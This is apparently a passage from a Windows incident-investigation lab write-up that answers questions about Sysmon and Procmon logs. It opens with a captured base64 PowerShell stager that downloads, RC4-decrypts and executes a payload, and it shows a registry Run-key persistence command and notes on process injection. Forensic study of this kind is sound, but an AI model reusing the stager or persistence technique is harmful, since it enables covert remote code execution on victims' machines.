               CgAJwBhAHcAWABVAEQAawBpAHQAPABvAFYAOQBKAGMAUgBPAEwAewAlAGcAUQAuAHwAMwBuAEgAcQBNAHAAQQAvAGwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAHMAOwAkAFMAPQAwAC4ALg
               AyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQ
               ASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBb
               ACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJ
               AAyADcAQwBFAC4ASABlAGEARABlAHIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBSAGoATQBlAGUAawA9AFoAbQBRAEwASABhAGMATQBCAFgAcgBMAGMAQgArAFYARQBsAHYATABjAHcATwAyAD
               YARQBZAD0AIgApADsAJABEAGEAdABBAD0AJAAyADcAQwBlAC4ARABPAHcAbgBsAG8AQQBkAEQAQQB0AEEAKAAkAFMAZQByACsAJABUACkAOwAkAGkAdgA9ACQARABhAFQAQQBbADAALgAuADMAXQA7ACQARAB
               hAHQAQQA9ACQAZABBAHQAQQBbADQALgAuACQARABhAHQAYQAuAGwARQBOAGcAdABoAF0AOwAtAGoATwBJAE4AWwBDAEgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABBAHQAQQAgACgAJABJAFYAKwAkAEsA
               KQApAHwASQBFAFgA
               CurrentDirectory: C:\Users\Administrator\
               User: WIN-Q5JJRDM876J\Administrator
               LogonGuid: {786593ca-776c-6009-5ea8-030000000000}
               LogonId: 0x3A85E
               TerminalSessionId: 1
               IntegrityLevel: High
               Hashes: SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160
               AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
               ParentProcessGuid: {786593ca-24a3-600a-e400-000000000300}
               ParentProcessId: 3624
               ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"



PS C:\Users\Administrator\Desktop> Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=13' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl


TimeCreated  : 1/21/2021 5:08:13 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 13
Message      : Registry value set:
               RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
               EventType: SetValue
               UtcTime: 2021-01-22 01:08:13.468
               ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               ProcessId: 2684
               Image: C:\Windows\Explorer.EXE
               TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
               Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell
               -Win Hidden -enc $x"


# Between 1/21/2021 5:05:50 PM and 1/21/2021 5:08:13 PM
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/*' | Sort-Object TimeCreated 

CreateRemoteThread, 1

What is the UTC time for the first event between these 2 processes?

# 1/21/2021 5:07:06 PM
$date = [datetime]"1/21/2021 5:07:06 PM"
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath "*/System/EventID=8" | Sort-Object TimeCreated | Where-Object {$_.TimeCreated -like $date} | fl

TimeCreated  : 1/21/2021 5:07:06 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 8
Message      : CreateRemoteThread detected:
               RuleName: -
               UtcTime: 2021-01-22 01:07:06.182
               SourceProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               SourceProcessId: 3088
               SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               TargetProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               TargetProcessId: 2684
               TargetImage: C:\Windows\explorer.exe
               NewThreadId: 4872
               StartAddress: 0x00000000027D0000
               StartModule: -
               StartFunction: -

2021-01-22 01:07:06.182

What is the value under Date and Time? (MM/DD/YYYY H:MM:SS [AM/PM])

TimeCreated  : 1/21/2021 5:07:06 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 8
Message      : CreateRemoteThread detected:
               RuleName: -
               UtcTime: 2021-01-22 01:07:06.182
               SourceProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               SourceProcessId: 3088
               SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               TargetProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               TargetProcessId: 2684
               TargetImage: C:\Windows\explorer.exe
               NewThreadId: 4872
               StartAddress: 0x00000000027D0000
               StartModule: -
               StartFunction: -

1/21/2021 5:07:06 PM

What is the first operation listed by the 2nd process starting with the Date and Time from Q25?

# First Operation Start with 3088
# So, Procmon filter with pid
Thread Create

What is the full registry path that was queried by the attacker to get information about the victim?

# Filter 'Path Contains ReleaseID'
HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ReleaseID

What is the name of the last module in the stack from this event which had a successful result?

<unknown>

Most likely what module within the attack framework was used between the 2 processes?

Invoke-PSInject

What is the MITRE ID for this technique?

https://attack.mitre.org/techniques/T1055/

PreviousInvestigating Windows 2.x NextAndroid Malware Analysis

Last updated 4 years ago